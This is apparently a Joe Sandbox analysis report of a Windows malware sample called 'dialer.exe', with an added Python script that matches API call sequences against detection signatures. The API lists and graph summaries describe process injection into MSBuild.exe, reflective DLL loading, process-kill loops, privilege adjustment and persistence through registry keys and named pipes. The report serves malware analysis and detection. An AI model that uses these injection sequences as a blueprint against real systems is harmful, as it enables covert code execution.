• Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
• String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
• API String ID: 2561231171-3753927220
• Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
• Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
• Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
• Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
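The callgraph at the top of this section (function 140001c88: CreateProcessW, VirtualAllocEx, WriteProcessMemory, GetThreadContext, SetThreadContext, ResumeThread) and the control-flow graph for 1400010c0 above (OpenProcess, VirtualAllocEx, WriteProcessMemory, WaitForSingleObject, with the strings MSBuild.exe and ReflectiveDllMain) show the two injection primitives as ordered API sequences, and the 1400014d8 path shows the enumerate-open-terminate loop. The Python below is an added example, not part of the Joe Sandbox report: it parses the report's textual graph dumps (node id, address or address range, API names, `call <addr>`, `* <n>` repeat markers, `<n> API calls` summaries and `a->b` edges), orders the nodes by address, and matches ordered API subsequences against three patterns. The three input strings are trimmed copies of this section's graph text; the pattern names and the APIs chosen for each pattern are the example's own, not report terminology.

```python
import re

# Token grammar of the graph dumps as they appear on this page.
ADDR_RE = re.compile(r"^[0-9a-fA-F]{8,}(?:-[0-9a-fA-F]{8,})?$")
API_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
SKIP = {"API", "calls", "*"}          # "30 API calls", "* 3": counts are dropped as digits


def parse_graph(text):
    """Return [(start_address, [api, ...]), ...] sorted by address.

    API names attach to the most recent node address; edges, node ids, call
    targets and repeat counts are discarded.
    """
    nodes = []
    current = None
    tokens = text.split()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "call":              # "call <addr>": the callee is not a node of this graph
            i += 2
            continue
        if tok in SKIP or "->" in tok or (tok.isdigit() and len(tok) < 8):
            i += 1                     # marker, edge, or small decimal node id
            continue
        if ADDR_RE.match(tok):
            current = (int(tok.split("-")[0], 16), [])
            nodes.append(current)
        elif API_RE.match(tok) and current is not None:
            current[1].append(tok)
        i += 1
    nodes.sort(key=lambda node: node[0])
    return nodes


def api_sequence(text):
    """Flatten the parsed graph into one API list in address order."""
    return [api for _, apis in parse_graph(text) for api in apis]


def ordered_subsequence(pattern, sequence):
    """True if every API in pattern occurs in sequence in that order, gaps allowed."""
    it = iter(sequence)
    return all(any(api == seen for seen in it) for api in pattern)


# Pattern names and API choices are the example's own.
SIGNATURES = {
    "pe-injection-into-new-process": [
        "CreateProcessW", "VirtualAllocEx", "WriteProcessMemory",
        "GetThreadContext", "SetThreadContext", "ResumeThread"],
    "write-into-existing-process": [
        "OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "WaitForSingleObject"],
    "process-kill-loop": [
        "K32EnumProcesses", "OpenProcess", "TerminateProcess"],
}


def classify(text):
    """Names of the signatures whose API order is present in the graph text."""
    seq = api_sequence(text)
    return sorted(name for name, pattern in SIGNATURES.items()
                  if ordered_subsequence(pattern, seq))


# Trimmed copies of this section's callgraph and control-flow dumps.
GRAPH_140001C88 = (
    "617 140001c88 618 140001cbb 617->618 619 140001cce CreateProcessW 618->619 "
    "621 140001e97 618->621 623 140001e62 OpenProcess 618->623 "
    "625 140001dd2 VirtualAlloc 618->625 627 140001d8c WriteProcessMemory 618->627 "
    "619->618 620 140001d2b VirtualAllocEx 619->620 620->618 "
    "622 140001d60 WriteProcessMemory 620->622 622->618 623->618 "
    "624 140001e78 TerminateProcess 623->624 624->618 625->618 "
    "626 140001df1 GetThreadContext 625->626 626->618 "
    "628 140001e09 WriteProcessMemory 626->628 627->618 628->618 "
    "629 140001e30 SetThreadContext 628->629 629->618 "
    "630 140001e4e ResumeThread 629->630 630->618 630->621"
)
GRAPH_1400010C0 = (
    "control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c "
    "24->27 29 140001122-140001138 OpenProcess 27->29 30 14000113e-14000115b OpenProcess "
    "29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 "
    "40 1400011d8-1400011ea StrCmpIW 38->40 39 140001230-140001248 OpenProcessToken "
    "55 14000134a-14000138a call 140001ec4 * 3 54->55 "
    "72 1400013f3-14000141a VirtualAllocEx 66->72 73 140001420-140001439 WriteProcessMemory "
    "74 14000143b-14000145d call 14000211c 73->74 80 140001478-140001485 WaitForSingleObject "
    "83 140001487-14000149b GetExitCodeThread 80->83 81 1400014ab CloseHandle"
)
GRAPH_1400014D8 = (
    "502 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 496->502 "
    "498 140001885 GetProcessHeap HeapFree 499 140001830 499->498 "
    "500 140001851 OpenProcess 499->500 500->499 "
    "501 140001867 TerminateProcess CloseHandle 500->501 501->499 "
    "505 14000157a OpenProcess 503->505 506 140001597 K32EnumProcessModules 505->506 "
    "508 1400015c9 ReadProcessMemory 503->508 544 14000175c 22 API calls 541->544"
)

if __name__ == "__main__":
    for name, text in (("140001c88", GRAPH_140001C88), ("1400010c0", GRAPH_1400010C0),
                       ("1400014d8", GRAPH_1400014D8)):
        print(name, classify(text))
        print("  ", " -> ".join(api_sequence(text)))
```

Address order is a proxy for execution order: it follows code layout, which for straight-line paths is what the compiler emitted, but loops and error paths can reorder calls, so a pattern match is a lead for the analyst, not proof on its own.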

Memory Dump Source
• Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
• String ID:
• API String ID: 4084875642-0
• Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
• Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
• Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
• Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

Memory Dump Source
• Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
• String ID: .text$C:\Windows\System32\
• API String ID: 2721474350-832442975
• Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
• Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
• Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
• Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

Memory Dump Source
• Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
• String ID: M$\\.\pipe\dialerchildproc64
• API String ID: 2203880229-3489460547
• Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
• Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
• Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
• Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

Control-flow Graph for 1400021d0 (figure rendered as text; the executed/not-executed colouring is lost). Sequence: call 140001b54 (pipe creation), with Sleep and retry (1400021f2) until it succeeds; then a loop of ConnectNamedPipe, ReadFile, non-API handling of the data read (14000222f-14000223f), DisconnectNamedPipe; a failed ConnectNamedPipe goes through Sleep (140002241) before DisconnectNamedPipe and the next iteration.
Memory Dump Source
• Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
• String ID: \\.\pipe\dialercontrol_redirect64
• API String ID: 2071455217-3440882674
• Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
• Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
• Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
• Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

Memory Dump Source
• Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
• String ID:
• API String ID: 3197395349-0
• Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
• Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
• Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
• Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

Control-flow Graph for 140002b38 (figure rendered as text; the executed/not-executed colouring is lost). Sequence: GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc; then a loop of K32EnumProcesses, a walk over the returned PID array (140002bb4-140002bda) that calls 140002540 for selected entries, Sleep (140002beb), and re-enumeration.
Memory Dump Source
• Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: Heap$AllocProcess$EnumProcessesSleep
• String ID:
• API String ID: 3676546796-0
• Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
• Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
• Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
• Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

APIs
• GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
• HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
  • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
  • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
  • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
  • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
  • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
• OpenProcess.KERNEL32 ref: 0000000140001859
• TerminateProcess.KERNELBASE ref: 000000014000186C
• CloseHandle.KERNEL32 ref: 0000000140001875
• GetProcessHeap.KERNEL32 ref: 0000000140001885
Memory Dump Source
• Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
• String ID:
• API String ID: 1323846700-0
• Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
• Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
• Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
• Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                                                 Control-flow Graph (figure omitted): function 1400018ac, API calls OpenProcess, IsWow64Process, CloseHandle
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                • String ID:
                                                                                • API String ID: 10462204-0
                                                                                • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                                • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                                                 Control-flow Graph (figure omitted): function 140002258, calls subfunction 14000226c, then ExitProcess
                                                                                APIs
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                                  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                                  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                                  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                                  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                                  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                                  • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                                  • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                                  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                                  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                                  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                                  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                                  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                                  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                                  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                                • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                                Similarity
                                                                                • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                • String ID:
                                                                                • API String ID: 3836936051-0
                                                                                • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                                • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                                 Control-flow Graph (figure omitted): function 140002560, API calls GetProcessHeap, HeapAlloc, HeapFree, K32EnumProcesses, ReadFile, RegOpenKeyExW, RegDeleteValueW, ShellExecuteW, lstrlenW, ExitProcess; calls subfunctions 140001000, 1400010c0, 1400014d8, 1400016cc, 14000175c, 1400017ec, 1400018ac, 140001944, 1400019c4, 140001c88, 14000217c, 1400021a8, 140002a90
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                • String ID: SOFTWARE$dialerstager$open
                                                                                • API String ID: 3276259517-3931493855
                                                                                • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                                • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                                • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                                • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                                                 Control-flow Graph (figure omitted): function 140001c88, API calls CreateProcessW, VirtualAllocEx, WriteProcessMemory, VirtualAlloc, GetThreadContext, SetThreadContext, ResumeThread, OpenProcess, TerminateProcess
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                • String ID: @
                                                                                • API String ID: 3462610200-2766056989
                                                                                • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                • String ID: dialersvc64
                                                                                • API String ID: 4184240511-3881820561
                                                                                • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Delete$CloseEnumOpen
                                                                                • String ID: SOFTWARE\dialerconfig
                                                                                • API String ID: 3013565938-461861421
                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 148219782-3440882674
                                                                                • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 1646373207-2227199552
                                                                                • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                                Execution Graph

                                                                                Execution Coverage:2.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:826
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtQueryValueKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID:
                                                                                • API String ID: 3660427363-0
                                                                                • Opcode ID: 6751f840f2f5aebd6751d524e6efc601c9bb43c772484294e188eecfbad3158e
                                                                                • Instruction ID: db77473c3d931d0fcdff88eb00413d93014a399b348e2779a93e53daa222875a
                                                                                • Opcode Fuzzy Hash: 6751f840f2f5aebd6751d524e6efc601c9bb43c772484294e188eecfbad3158e
                                                                                • Instruction Fuzzy Hash: 0BF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB40

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$wcscatwcscpywcsncmp
                                                                                • String ID: 0$X$\BaseNamedObjects\krwgvaizwkrekxljjkewdlmp$`
                                                                                • API String ID: 597572034-4019176162
                                                                                • Opcode ID: c600c716e08e094fafbff1190e846a4c8af8233fcc056b851a4b5868120616ec
                                                                                • Instruction ID: 6d2fbcda24ca89716a86bde41687ff7fffd3aad73cb8576b26b5126aeab97ea9
                                                                                • Opcode Fuzzy Hash: c600c716e08e094fafbff1190e846a4c8af8233fcc056b851a4b5868120616ec
                                                                                • Instruction Fuzzy Hash: 5F1248B2608BC481E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 2643109117-0
                                                                                • Opcode ID: f4770097703a93e6ebc2b28b43cd9dde9cff56eadf7c464ec9f392a7b96236ef
                                                                                • Instruction ID: f5b649809ecdb1e3254532f3c56674770b0d491324e0a3fa73df4e492b336c57
                                                                                • Opcode Fuzzy Hash: f4770097703a93e6ebc2b28b43cd9dde9cff56eadf7c464ec9f392a7b96236ef
                                                                                • Instruction Fuzzy Hash: DA5122B1A11A4085FB16EF27F9947EA27A5AB8D7D0F808121FB4D873B6DE38C4958300

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
